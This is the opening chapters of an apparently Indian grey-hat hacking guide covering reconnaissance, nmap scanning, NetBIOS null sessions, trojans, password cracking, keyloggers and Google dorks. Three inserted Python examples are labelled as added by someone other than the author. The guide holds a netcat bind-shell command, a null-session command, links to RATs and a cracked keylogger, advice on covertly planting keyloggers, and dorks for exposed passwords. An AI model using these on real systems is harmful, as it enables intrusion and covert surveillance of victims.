Hitesh Malviya, one of the foremost IT security experts of India, has released his first book on hacking, named "Hackdecode...
Hackdecoders v 1.0 Official Guide to Greyhat Hacking “If you come to know the hacker’s mind then you can’t be hacked”
Hitesh Malviya
(B. Tech, C!EH, EC!SA, MCITP, CCNA)
Legal Disclaimer
Any proceedings or activities related to the material contained within this volume are exclusively your liability. Misuse or mistreatment of the information in this book can result in unlawful charges being brought against the persons in question. The author and reviewers will not be held responsible in the event that unlawful charges are brought against any individuals who misuse the information in this book to break the law. This book contains material and resources that can be potentially destructive. If you do not fully comprehend something in this book, do not study this book. Please refer to the laws and acts of your state/region/province/zone/territory or country before accessing, using or in any other way utilizing these resources. These materials and resources are for educational purposes only. Do not attempt to violate the law with anything enclosed herein. Neither the writer of this book, the reviewers, the publishers nor anyone else affiliated in any way is going to admit any responsibility for your proceedings, actions or trials.
About the Author
Hitesh Malviya is an independent information security researcher, Certified Ethical Hacker and ethical hacking trainer, with a broad knowledge of the computer field. Malviya is best known for Hindustan Cyber Force, India's No. 1 ethical hacking forum, of which he is the founder. He has found serious vulnerabilities in the top social networking websites Orkut and Facebook. He is continuously working in the field of cyber security to secure most Indian domain websites. Presently, Hitesh Malviya is working with HCF Infosec Limited as Chief Executive Officer and with RRN Technologies as a penetration tester. Qualifications: MCP, MCTS, MCITP, CCNA, C!EH, EC!SA
Preface
Computer hacking is the art of exploitation. It is the way of entering a creator's system without his knowledge and carrying out some changes in his original creation. Persons involved in these activities are usually known as hackers. Hacking does not mean stealing someone's confidential information, cracking data, cracking systems and all such criminal activities; most people misunderstand us as criminals. Ethical hackers are those people who use their deep knowledge to secure companies' and organizations' networks from crackers. They are the cops behind crackers and black hat hackers. At present, cyber threats are at their peak. Exploits are easily available on the internet, and by using them any technically sound person can hack into your system or website, so awareness is a must to protect yourself from these types of cyber attacks and the latest threats. After reading this book you will come to know about an ethical hacker's job roles, and the tactics and methods they use to secure networks and systems. You will come to know the hacker's mind, because once you know this you can't be hacked.
“If you come to know the hacker’s mind then you Can’t be hacked” - Hitesh Malviya (Ethical Hacker)
Acknowledgements
A book or volume of this temperament is tremendously complex to write, particularly without the support of the Almighty GOD. I express heartfelt credit to my parents Mr. O. R. Solanki & Mrs. Bhawana Solanki, without whom I have no existence. All together, I am thankful to Mr. Chandshekar Rathinam, Mr. Moin Ahmed, Arjun Tyagi, Jatin Garg, Neeraj Dhiman, Ashish Saini and all Hindustan Cyber Force crew members and all individuals who facilitated me at various stages of this volume. To finish, I am thankful to you also, as you are reading this book. I am sure that it will play a creative and constructive role in making your digital life more secure and aware than ever before.
Contents at a Glance
Chapter 1 Introduction to Ethical Hacking 8-10
Chapter 2 Information Gathering & Footprinting 11-14
Chapter 3 Scanning & Enumeration 15-25
Chapter 4 Trojans and Backdoors 26-36
Chapter 5 System Hacking 37-44
Chapter 6 Google Hacking (Basic & Advanced) 45-51
Chapter 7 SQL Injection and Countermeasures 52-66
Chapter 8 Cross Site Scripting and Countermeasures 67-72
Chapter 9 Remote File Inclusion and Countermeasures 73-76
Chapter 10 Email Account Cracking & Security 77-85
Chapter 11 Facebook Account Hacking & Security 86-94
Chapter 12 Facebook Clickjacking 95-102
Chapter 13 VPN & Proxies 103-113
Chapter 14 Hacking Mobile Phones, PDA, Handheld Devices 114-124
Chapter 15 Career Certifications in Information Security 125-131
Chapter 1
Introduction
Objectives:
Hacker Classes
Essential Terminologies
Ethical Hacking
Steps to Perform Ethical Hacking
What Ethical Hackers Do
Hacking is the art of gaining unauthorized access to computer systems and networks. The persons behind the scene are called hackers. Sometimes hacking is defined as making changes to a system's code that lead to a malicious change in the system.
Hacker Classes
Hackers can be divided into three classes:
White Hat: These are the security guys, who work as security consultants to secure company networks from cyber threats and attacks. They provide solutions to defend against cyber threats. They are also known as Ethical Hackers.
Black Hat: These are the bad guys; they use their skills in a destructive manner. They are highly skilled technology geeks who use their skills in cracking servers and networks.
Grey Hat: A hacker who works in both an offensive and a defensive manner is called a Grey Hat. It is called the most sophisticated category of hacker.
Essential Terminologies
Threat: An action or event that might compromise security; a threat is a potential violation of security.
Vulnerability: The existence of a weakness in design, or an unexpected error, that can lead to an unexpected and undesirable event is called a vulnerability.
Attack: An attack is an action that violates security.
Exploit: An exploit is a defined way to breach security; it is used to gain unauthorized access to systems.
Ethical Hacking
Ethical hacking is the methodology of protecting against cyber threats and attacks. The persons behind the scene are called Ethical Hackers. Ethical hackers provide a shield for computer networks and systems to protect against cyber threats and attacks.
Steps to Perform Ethical Hacking
(1) Information Gathering: This is the first step of ethical hacking. It can be performed in two ways, active and passive. Active information gathering is performed inside the network and passive information gathering is performed from outside the network. Various online tools and remote application tools are used for this purpose.
(2) Scanning: In this phase, scanning for live hosts is performed by using port scanners. Nmap is one of the best tools used for scanning by ethical hackers.
(3) Gaining Access: This is the penetration phase; the hacker exploits a vulnerability to gain access to the system.
(4) Maintaining Access: The hacker changes ownership of the system in this phase and installs a backdoor on the system for further access.
(5) Clearing Tracks: Clearing tracks refers to the activity of cleaning all log files from the compromised system. Various log cleaners are used for this purpose.
What Ethical hackers do? “If you know the enemy and know yourself, you need not fear the result of a hundred battles”
-Sun Tzu (Art of war)
Ethical hackers try to answer the following questions:
What can an intruder (attacker) see on the target system? (Information gathering and scanning phases)
What can an intruder do with the information? (Gaining access and maintaining access phases)
Does anyone at the target notice the intruder's attempts or successes? (Covering tracks phase)
Chapter 2
Information Gathering
Objectives:
Information Gathering Methods
IP Address Lookup
Extracting Archive of Website
Mobile Number Lookup
Email Spiders
Information gathering is the first step towards hacking any system or company network. You need to gather information about the system or company network before launching an attack. Search engines such as Google, Yahoo and Bing can also be used for information gathering. The use of the Google search engine to retrieve information is known as Google hacking. Yahoo People and Google Groups have also proved helpful for retrieving information about any person or organization.
Information Gathering Methods
Domain Name Lookup & Whois: Finding information about a particular domain name is called a domain whois lookup; several websites provide this service. We just have to provide the domain name, and the lookup utility will retrieve all information about the domain and the domain administrator. Some websites which provide this utility:
http://www.whois.com/
http://who.is/
http://www.networksolutions.com/whois/index.jsp
We can also use tools for this purpose. Here are some tools with download links:
SmartWhois
Download Link: http://download.cnet.com/SmartWhois/3000-2085_4-10059497.html
ActiveWhois
Download Link: http://download.cnet.com/Active-Whois/3000-2085_4-10205156.html
CountryWhois
Download Link: http://www.softpedia.com/progDownload/CountryWhois-Download39324.html
DNS Lookup:
A DNS lookup utility is used for finding information about the DNS records and name servers of any particular domain.
NSLOOKUP Command: nslookup is a built-in command line tool used for retrieving information about DNS records. In interactive mode you start nslookup, set the record type you want, and then enter the domain name. A few parameters are used in the process of gathering DNS information:
(1) To retrieve the authoritative name server (NS) records
>nslookup
>set type=ns
>domain name
(2) To retrieve the mail exchange (MX) server records
>nslookup
>set type=mx
>domain name
(3) To retrieve CNAME records
>nslookup
>set type=cname
>domain name
(4) To retrieve all DNS records
>nslookup
>set type=all
>domain name
Here are some websites which provide online tools for DNS lookup:
http://www.dnswatch.info/
http://www.dnsstuff.com/
IP Address Lookup:
The IP address always plays an important role in the commission of a cyber crime. We can get information about an IP address using some online tools:
http://www.ipgetinfo.com/
http://ip-lookup.net/
Extracting Archive of Website:
You can get all the information about a company's website since the time it was launched at www.archive.org. You can also use the cache option in Google search results to get archived copies of the website.
Mobile Number Lookup:
You can get all the information about any mobile number (location, service provider, GPS location etc.) by using these online tools:
http://www.internet4mobile.com/mobile_number_information.aspx
http://www.india-cellular.com/mobile-number-locator.aspx
http://www.phonecellnumberlookup.com/
http://www.trace.bharatiyamobile.com/
Email Spiders:
An email spider is an application used to retrieve all the email addresses found on any particular website. It is used for gathering information about the working email addresses of any company.
Here are some email spider tools:
Power Email Collector tool
Download link: http://www.filebuzz.com/findsoftware/Power_Email_Collector/1.html
Chapter 3
Scanning & Enumeration
Objectives:
Port Scanning
Network Scanning
Vulnerability Scanning
Banner Grabbing
Scanning using Nmap
Enumeration
NetBIOS Enumeration
Enumerating User Accounts
Scanning is performed as a preliminary step before launching an attack. Scanning is performed to find the following information about the system:
Specific IP addresses
Operating systems
System architecture
Services running on the system
Various scanners are used for this purpose.
Types of Scanning
(1) Port Scanning
(2) Network Scanning
(3) Vulnerability Scanning
Port Scanning
Port scanning is performed to gather intelligence about the open ports on a system. Each service runs on a fixed port number. Here are some services and the port numbers they run on:
HTTP 80
FTP 21
TELNET 23
SMTP 25
NetBIOS/SMB (TCP) 135, 139, 445
HTTPS 443
Port scanning is used by hackers to get information about unknown open ports on the system; using those ports they can gain access to the system.
Here are some port scanners that can be used for this purpose; you can download them from the links given below and try your hands on them.
SuperScan: A Windows-only port scanner, pinger and resolver.
Download Link: http://www.foundstone.com/us/resources/proddesc/superscan.htm
AngryIPScanner: IP address and port scanner.
Download Link: http://www.angryziber.com/ipscan/
UnicornScan: "Not your mother's port scanner."
http://www.unicornscan.org/
Scanrand: An unusually fast stateless network service and topology discovery system.
http://www.doxpara.com/
Network Scanning
Network scanning is the way of gathering intelligence about the alive and dead hosts in a network. Various network scanners are used for this purpose. We can also use the ping command for finding active hosts on the network. Here are some network scanners with download links; you can use these for network scanning.
SoftPerfect Network Scanner It is a free multi-threaded IP, NetBIOS and SNMP scanner with a modern interface and many advanced features. It is intended for both system administrators and general users interested in computer security. The program pings computers, scans for listening TCP/UDP ports and displays which types of resources are shared on the network (including system and hidden).
Download Link: http://www.softperfect.com/download/freeware/netscan.exe
Solarwinds Engineer’s toolset It includes 49 powerful network management, monitoring and Troubleshooting tools to easily and effectively manage your network.
Download Link: http://download.cnet.com/SolarWinds-Engineer-s-Toolset/30002651_4-10764878.html
Vulnerability Scanning
It is the automated process of identifying vulnerabilities in the computer systems present in a network. Some vulnerability scanners can be used for this purpose. Here are some vulnerability scanners with download links below:
SAINT SAINT is another commercial vulnerability assessment tool (like Nessus, ISS Internet Scanner, or Retina). It runs on UNIX and used to be free and open source, but is now a commercial product.
Download Link: http://www.lynjonic.com/free_trial.htm
Nessus Vulnerability Scanner
Nessus is a vulnerability scanner which looks for bugs in software. An attacker can use this tool to violate the security aspects of a software product.
Features:
Plug-in architecture
NASL (Nessus Attack Scripting Language)
Can test an unlimited number of hosts simultaneously
Smart service recognition
Smart plug-ins
Up-to-date security vulnerability database
Download Link:- www.tenable.com/products/nessus
Retina Vulnerability Scanner It can scan every machine on the target network, including a variety of operating system platforms, Networking devices, databases and third party or custom applications. It has most up-to-date vulnerability database and scanning methodology.
Download Link: http://www.brothersoft.com/retina-network-security-scanner-223041.html
Banner Grabbing:
Banner grabbing is the technique used to grab the banner of a web server; it returns the HTTP response headers of the website. The built-in Telnet command line tool is used for this purpose.
Command:
telnet domain name 80
HEAD / HTTP/1.0
(press Enter twice after the HEAD line to send the request; the server answers with its headers, including the Server banner)
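To audit what your own web server gives away in that banner, here is an added Python example (not code from the book): it starts a throwaway local HTTP server whose Server header is a constructed, version-bearing value, sends the same HEAD / HTTP/1.0 request the telnet session above types by hand, parses the response headers, and flags a Server header that discloses a product version. The host, port and banner string are assumptions made for the demonstration.

```python
import re
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Matches a product/version token such as "Apache/2.2.14" or "nginx/1.18.0".
VERSION_RE = re.compile(r"/\d+(\.\d+)+")


class _BannerHandler(BaseHTTPRequestHandler):
    """Stand-in target: a local server advertising a constructed banner."""
    server_version = "Apache/2.2.14"   # constructed value, chosen to show version disclosure
    sys_version = ""                   # drop the "Python/3.x" suffix http.server normally appends

    def do_HEAD(self):
        self.send_response(200)        # send_response also emits the Server and Date headers
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):      # keep the demo quiet
        pass


def start_local_server():
    """Bind on 127.0.0.1 with an OS-chosen port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), _BannerHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def grab_banner(host, port, timeout=5.0):
    """Send HEAD / HTTP/1.0 over a raw socket and return (status line, {header: value})."""
    request = b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:              # HTTP/1.0: the server closes after its response
                break
            raw += chunk
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    status_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status_line, headers


def discloses_version(server_header):
    """True when the Server header leaks a product version an attacker could look up."""
    return bool(server_header) and VERSION_RE.search(server_header) is not None


def audit_local_server():
    """Run the whole check against the throwaway server and return the verdict."""
    srv = start_local_server()
    try:
        status, headers = grab_banner("127.0.0.1", srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()
    server = headers.get("server", "")
    return {"status": status, "server": server, "version_disclosed": discloses_version(server)}


if __name__ == "__main__":
    print(audit_local_server())
```

Pointing grab_banner at a real host you administer (instead of the throwaway server) shows exactly what a scanner sees; a verdict of version_disclosed=True is the cue to turn off version reporting in the server configuration, since the exact version is what an attacker matches against a vulnerability database.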
Scanning using Nmap
Nmap is an open source utility used for network exploration; it is designed to rapidly scan large networks. Nmap is used to carry out port scanning, OS detection, version detection, ping sweeps and many other techniques.
Nmap scanning options:
-sT (TCP connect scan)
-sS (SYN scan)
-sF (FIN scan)
-sX (XMAS scan)
-sN (Null scan)
-sP (Ping scan)
-sU (UDP scan)
-sI (Idle scan)
-sW (Window scan)
-sR (RPC scan)
-sL (List/DNS scan)
-P0 (don't ping; spelled -Pn in current Nmap releases)
-PT (TCP ping)
-PS (SYN ping)
-PI (ICMP ping)
-PM (ICMP netmask ping)
Download Link: www.nmap.org/download.htm
Enumeration
Enumeration is defined as the extraction of usernames, shares, machine names, resources and services. Enumeration is conducted in an intranet (LAN) environment.
NetBIOS Enumeration
NetBIOS is the naming and session service that Windows hosts expose on a domain over the network; once you extract NetBIOS information, you can get the shares, services and all other information about the domain. NetBIOS enumeration can be performed by using the following Windows built-in command line tools:
Using Net View
Net View lists all hosts present in the domain and lists all shares of an individual host in the domain.
Commands:
net view /domain
net view \\
Using nbtstat
nbtstat is the built-in Windows command line tool used to display information about a computer's NetBIOS connections and name tables.
Run: nbtstat -A IP address
nbtstat displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).
Usage: nbtstat [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-s] [-S] [interval]
NetBIOS Null Sessions
The null session is often referred to as the holy grail of Windows hacking. Null sessions take advantage of flaws in SMB (Server Message Block). You can establish a connection with a Windows host by logging on with a null username and password. DumpSec is a tool used to reveal shares over a null session with the target computer.
Download Link: - http://www.systemtools.com/cgi-bin/download.pl?DumpAcl
Inter Process Communication (IPC)
Using the IPC$ share, anyone can list the shares or resources of any host in the domain over the network by creating a null session.
Command: c:\>net use \\ \IPC$ "" /u:""
Null Session Countermeasures
Null sessions require access to TCP ports 139 and 445. They don't work in Windows Server 2003. You could disable the SMB service to prevent null sessions. Another way is to restrict anonymous users by editing the registry settings:
Step 1. Open regedt32 and navigate to HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Step 2. Choose Edit | Add Value
Value name: RestrictAnonymous
Data type: REG_DWORD
Value: 2
Enumerating User Accounts
Two powerful tools are used for this purpose:
User2sid
Sid2user
They can be downloaded at www.chem.msu.su/~rudnyi/NT/
Tool: GetAcct. It is also used to retrieve information about user accounts on Windows 2000/NT machines. It sidesteps "RestrictAnonymous=1".
Download link: www.securityfriday.com
Chapter 4
Trojans or Backdoors
Objectives:
Trojans
Types of Trojans
Different ways a Trojan can get into your system
Indications of Trojan attacks
Port numbers used by some known Trojans
Some classic Trojans
Trojan detecting tools
Anti-Trojan software
Backdoor program countermeasures
Trojans
Trojans are small pieces of program code used to infect a computer system. A Trojan hides its presence on the infected system. The attacker sends the Trojan to the victim machine when it goes online. A Trojan occupies a port number on the machine to run. An attacker smartly renames the Trojan after a predefined service on the machine, after which the user can't recognize that the Trojan exists on the machine.
Types of Trojans
Remote access Trojan
Data sending Trojan
Destructive Trojan
DoS attack Trojan
Proxy Trojan
FTP Trojan
Different ways a Trojan can get into your system
Instant messenger applications
Internet relay chat
Attachments
Physical access
NetBIOS (file sharing)
Fake programs
Untrusted sites and freeware software
Indications of Trojan attacks
CD-ROM drawer opens and closes by itself.
Wallpaper, screensaver and theme settings change by themselves.
The browser goes to a strange and unknown page by itself.
The computer shuts down and restarts by itself.
The taskbar disappears, and many other unusual things happen by themselves without user interaction.
Port Numbers Used by Some Known Trojans
Trojan          Protocol   Port
Back Orifice    UDP        31337 or 31338
Deep Throat     UDP        2140 or 3150
NetBus          TCP        12345 or 12346
Whack-a-mole    TCP        12361 or 12362
Some Classic Trojans
Tini: Tini is a small Trojan program which is only 3 KB in size and written in assembly language. Tini only listens on port 7777 and runs a command prompt when someone connects to this port. An attacker can telnet to the Tini server on port 7777 from the Tini client.
Download Link: http://ntsecurity.nu/toolbox/tini
NetBus
NetBus is a Win32-based Trojan program. Like Back Orifice, it allows a remote user to access and control the victim machine over its internet link. This virus is known as Backdoor.Netbus.
Download link: http://www.filestube.com/4c22b3aa2987df5503e9,g/netbus.html
Netcat
Netcat is called the Swiss-army knife of networking tools. It provides a basic TCP/UDP networking subsystem that allows users to interact manually or via script with network applications. It has built-in source routing capabilities.
Netcat client/server commands:
Client end: c:\>nc
Server end: c:\>nc -L -p -t -e cmd.exe
Download Link: http://netcat.sourceforge.net/
Beast
Beast is a powerful remote administration tool (RAT) built with Delphi 7. It provides a server and a client. Once an attacker manages to install Beast on the remote machine, it provides a server to the attacker's machine. The attacker can then remotely administer the victim machine and send remote commands through the server. It is a very powerful tool; the attacker can use many resources of the victim machine.
Download link: http://www.filestube.com/60e733eececb808203e9,g/Beast-v2-07.html
Trojan Detecting Tools:
You can detect a Trojan on the remote machine using the following tools:
TCP View
Download Link: http://download.cnet.com/TCPView/3000-2094_4-10796077.html
Msconfig utility
Windows built-in utility, accessed through the Run window.
Hijack this
Download Link: http://download.cnet.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html
Super System Helper tool
Download Link: http://www.filestube.com/7M84mA9A5TaJQhTJxTcXQR/Super-System-Helper-ToolEXE.html
Anti-Trojan Software:
TrojanHunter
Download Link: http://download.cnet.com/TrojanHunter/3000-8022_4-10703997.html
Spyware Doctor
Download Link: http://download.cnet.com/Spyware-Doctor/3000-8022_4-10377263.html
Comodo BOClean
Download Link: http://comodo-boclean.en.softonic.com/download
Backdoor Program Countermeasures
Most commercially available tools detect backdoor programs before they can cause damage. Educate people not to install applications downloaded from the internet or received as email attachments. File integrity checking can be used to detect backdoor programs on a machine.
Tripwire
Tripwire is a system integrity verifier (SIV). It periodically scans all the monitored files, and if any modification has occurred in their contents an alarm is raised.
Download Link: http://sourceforge.net/projects/tripwire/
MD5sum
MD5sum.exe is a checksum utility. It takes an MD5 digital snapshot of the system files. You can later check a suspected file's MD5 against the snapshot checksum.
Command: md5sum *.* > md5sum.txt
Download Link: http://www.pc-tools.net/win32/md5sums/
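The Tripwire and md5sum entries above describe the same idea: snapshot every file's digest, store the snapshot somewhere the attacker cannot reach, and diff a fresh scan against it. Here is an added Python example (not code from the book or from either tool) that does exactly that: it builds a baseline of a directory tree, writes it in md5sum's "digest  name" format, tampers with a constructed sample tree the way a backdoor install would, and reports added, removed and modified files. The directory layout and file contents are constructed for the demonstration; the digest algorithm defaults to MD5 to match the book but can be switched.

```python
import hashlib
import os
import shutil
import tempfile


def hash_file(path, algo="md5"):
    """Digest one file in chunks so large binaries never have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, algo="md5"):
    """Walk the tree and map each file (path relative to root, '/'-separated) to its digest."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full, algo)
    return baseline


def save_baseline(baseline, path):
    """Write the snapshot in md5sum's own 'digest  name' line format."""
    with open(path, "w", encoding="utf-8") as f:
        for rel in sorted(baseline):
            f.write(f"{baseline[rel]}  {rel}\n")


def load_baseline(path):
    """Read a snapshot written by save_baseline (or by md5sum itself)."""
    baseline = {}
    with open(path, encoding="utf-8") as f:
        for line in f:
            digest, _, rel = line.rstrip("\n").partition("  ")
            if digest and rel:
                baseline[rel] = digest
    return baseline


def compare(baseline, current):
    """Report what changed since the snapshot: new files, deleted files, files whose digest differs."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def demo():
    """Constructed scenario: snapshot a small tree, tamper with it, verify against the saved snapshot."""
    work = tempfile.mkdtemp()
    root = os.path.join(work, "system")
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "etc"))
    files = {
        "bin/service.exe": b"original binary",
        "etc/hosts": b"127.0.0.1 localhost\n",
        "README": b"ok\n",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    snapshot = os.path.join(work, "md5sum.txt")   # kept outside the monitored tree
    save_baseline(build_baseline(root), snapshot)

    # Simulate what a backdoor install looks like on disk: a replaced binary,
    # a deleted file and a dropped file (all constructed for the demo).
    with open(os.path.join(root, "bin/service.exe"), "wb") as f:
        f.write(b"trojanised binary")
    os.remove(os.path.join(root, "README"))
    with open(os.path.join(root, "etc/unknown.cfg"), "wb") as f:
        f.write(b"dropped file\n")

    try:
        return compare(load_baseline(snapshot), build_baseline(root))
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print(demo())
```

The snapshot is only worth as much as its storage: keep it on read-only or offline media, because an attacker who can rewrite md5sum.txt can hide the replaced binary. MD5 is also collision-prone, so an attacker able to craft colliding files can defeat an MD5 baseline; passing algo="sha256" to build_baseline closes that gap at no extra effort.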
Chapter 5
System Hacking
Objectives:
Password Cracking
Password Crackers
Keyloggers
Spyware
Keylogger Countermeasures
An attacker can access a system by gaining access to the user accounts of the remote machine. He needs to crack the passwords of the user accounts in order to gain access to the remote system.
Password Cracking
It is the way of cracking the passwords of a system. Encrypted passwords are saved in the system database. An attacker uses hacking tools to crack these encrypted passwords and, after obtaining the clear text password, can access the system. Three methods are used to crack passwords (offline attack):
Dictionary Word Attack
In this method, the password is found using dictionary words saved in a dictionary file. The password cracker tries the different passwords from the list one after another. It succeeds only with poor passwords. It takes very little time.
Brute-force Attack
It tries all possible combinations to find a password. It is a time consuming method. The time needed to crack the password depends on the length of the password; sometimes it takes 2-3 days to crack a password. It can be used against strong passwords.
Hybrid Attack
It is the combination of the dictionary word and brute-force attacks. This technique may be used when the password is not an existing word and the attacker tries some technique to crack it, such as appending digits or symbols to dictionary words.
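The three methods above map directly onto how a defender should judge a password: does it fall to a wordlist, to a wordlist plus simple mangling, or only to exhaustive search, and how large is that search? Here is an added Python example (not from the book) that classifies a candidate password by which of the three attacks would recover it and estimates the brute-force keyspace and time. The wordlist, the mangling rules and the guess rate are constructed assumptions for the demonstration.

```python
import string

# Constructed sample wordlist; a real dictionary attack uses millions of entries.
WORDLIST = ["password", "letmein", "admin", "welcome", "monkey", "dragon"]


def charset_size(password):
    """Size of the smallest standard character set that covers every character used."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += 26
    if any(c in string.ascii_uppercase for c in password):
        size += 26
    if any(c in string.digits for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)      # 32 printable ASCII symbols
    return size


def brute_force_keyspace(password):
    """Number of candidates an exhaustive search over that character set and length must try."""
    return charset_size(password) ** len(password)


def hybrid_candidates(word):
    """The mangling a hybrid attack applies to one dictionary word (assumed, typical rule set)."""
    variants = {word, word.capitalize(), word.upper()}
    for base in list(variants):
        for n in range(100):                  # append one or two digits: word1, word07, word99
            variants.add(f"{base}{n}")
            variants.add(f"{base}{n:02d}")
        variants.add(base + "!")              # trailing symbol
        variants.add(base[::-1])              # reversed word
    return variants


def classify(password, wordlist=WORDLIST):
    """Return which of the three attacks would recover this password."""
    if password in wordlist:
        return "dictionary"
    for word in wordlist:
        if password in hybrid_candidates(word):
            return "hybrid"
    return "brute-force"


def seconds_to_exhaust(password, guesses_per_second=1_000_000):
    """Worst-case time for a brute-force search at the assumed guess rate."""
    return brute_force_keyspace(password) / guesses_per_second


if __name__ == "__main__":
    for pw in ["password", "Password12", "letmein!", "T7#qv9Lm", "abcdefgh"]:
        print(pw, classify(pw), brute_force_keyspace(pw), f"{seconds_to_exhaust(pw) / 86400:.2f} days")
```

At the assumed million guesses per second, an eight-character all-lowercase password (26^8 candidates) is exhausted in about 2.4 days, which is the "2-3 days" figure the text quotes; adding upper case, digits and symbols to the same length raises the keyspace to 94^8 and the time to roughly two centuries, which is why the classification, not just the length, is what a password policy should enforce.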
Password Crackers
Abcom PDF Password Cracker is a program that breaks the security of PDF documents.
Download Link: http://abcom-pdf-password-cracker-pro.findmysoft.com/download/
L0phtCrack
L0phtCrack (LC4) is a Windows password cracker with an SMB packet capture tool for capturing password hashes from the network and cracking them.
Download Link: http://www.net-security.org/software.php?id=756
RainbowCrack
It is a tool used to crack hashes using the precomputed hashes stored in a rainbow table.
Download Link: http://www.net-security.org/software.php?id=515
John the Ripper
It is a command line tool designed to crack both UNIX and NT passwords.
Download Link: http://www.openwall.com/john/
Ophcrack
Ophcrack is a Windows password cracker based on a faster time-memory trade-off. It uses rainbow tables. It can crack 99% of passwords of the following kinds: passwords of length 6 or less composed of any characters, alphanumeric passwords of length 7 (both cases) and of length 8 (lowercase only).
Download Link: http://ophcrack.sourceforge.net/
Keylogger
A keylogger is a remote administration tool used by hackers to record activity on a remote machine. It records the keystrokes entered by a user on the remote machine and saves a log file on the system. It always works in hidden mode. We can grab all kinds of user accounts by using this tool; we only have to manage to install the keylogger on the remote machine. Once you have managed to install the keylogger on the remote machine, it will periodically send the log files to your server. There are two types of keyloggers:
Hardware keylogger
Software keylogger
Ardamax Keylogger Ardamax keylogger is a keystroke recorder that captures user’s activity and saves it in an encrypted log file. Logs can be automatically sent to your email address, access to keylogger is password protected. It runs in invisible mode.
Download Link: http://www.box.net/shared/lidooniyjv
Actual Spy Keylogger
It is designed for hidden computer monitoring. It is capable of capturing all keystrokes, the screen, the clipboard, website activity and print activity.
Download Link: http://www.4shared.com/file/J28nUoDK/Actual_Spy_3_Crack.html
Spyware
Spyware is a program that records computer activity on a machine:
Records keystrokes
Records email messages
Records IM chat sessions
Records websites visited
Records applications opened
Captures screenshots
AceSpy
It secretly records everything that is done on the computer and can also block websites or programs.
Download Link: http://download.cnet.com/AceSpy-Spy-Software/3000-2162_4-10206540.html
eBlaster
It shows what the surveillance target surfs on internet and records all emails,chats,instant messages, websites visited and keystrokes typed and automatically sends this recorded information to the desired email address.
Download Link: http://www.eblaster-download.com/
PCPhoneHome
The PCPhoneHome tool tracks stolen laptops: when the stolen laptop is online, it sends a stealth message containing its exact location to the predetermined email address.
Install the software and restart the computer
Start -> Run -> configmod
Enter your email address
That's all. Whenever your system is online, you will receive a notification through email.
Download Link: www.pcphonehome.com
Keylogger Countermeasures
Install antivirus and keep the signatures up-to-date.
Use a privacy keyboard while entering important user account names or passwords. You can download a privacy keyboard from http://anti-keylogger.com
Install a host-based IDS on your system.
Install anti-keylogger software on your system. You can get it from http://www.anti-keyloggers.com/download.html
Chapter 6
Google Hacking (Basic & Advanced)
Objectives:
Error messages
Files containing juicy information
Advisories & vulnerabilities
Files containing usernames
Files containing passwords
Pages containing login portals
Various online devices
Vulnerable servers
Google hacking is the art of grabbing information by using the Google search engine. A few search operators are used for this purpose. Mostly Google hacking is used for finding vulnerable files and servers. You can also use Google hacking to filter search results. The string keywords used for this purpose are called Google dorks. You can get the Google Hacking Database from http://www.hackersforcharity.org/ghdb/ and try the dorks given in the database. Here are some examples of Google hacking:
Error messages

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
This dork reveals logins to databases that were denied for some reason.

"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
PHP error with a full web root path disclosure.

"Warning: mysql_query()" "invalid query"
MySQL query errors revealing database schema and usernames.

filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
This search will show an attacker some PHP error logs which may contain information on which an attack can be based.

IIS web server error messages
intitle:"the page cannot be found" "internet information services"
This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into.
Files containing juicy info

"phpMyAdmin" "running on" inurl:"main.php"
From phpmyadmin.net: "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, showing processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!
"robots.txt" "Disallow:" filetype:txt
The robots.txt file serves as a set of instructions for web crawlers. The "disallow" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!

allinurl:cdkey.txt
CD keys.

exported email addresses
e-mail address filetype:csv csv
Loads of user information including email addresses exported in comma separated file format (.csv). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation.

filetype:conf inurl:firewall -intitle:cvs
These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes.

filetype:reg "Terminal Server Client"
These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses.

Financial spreadsheets: finance.xls
intitle:"Index of" finance.xls
"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"
Advisories & vulnerabilities

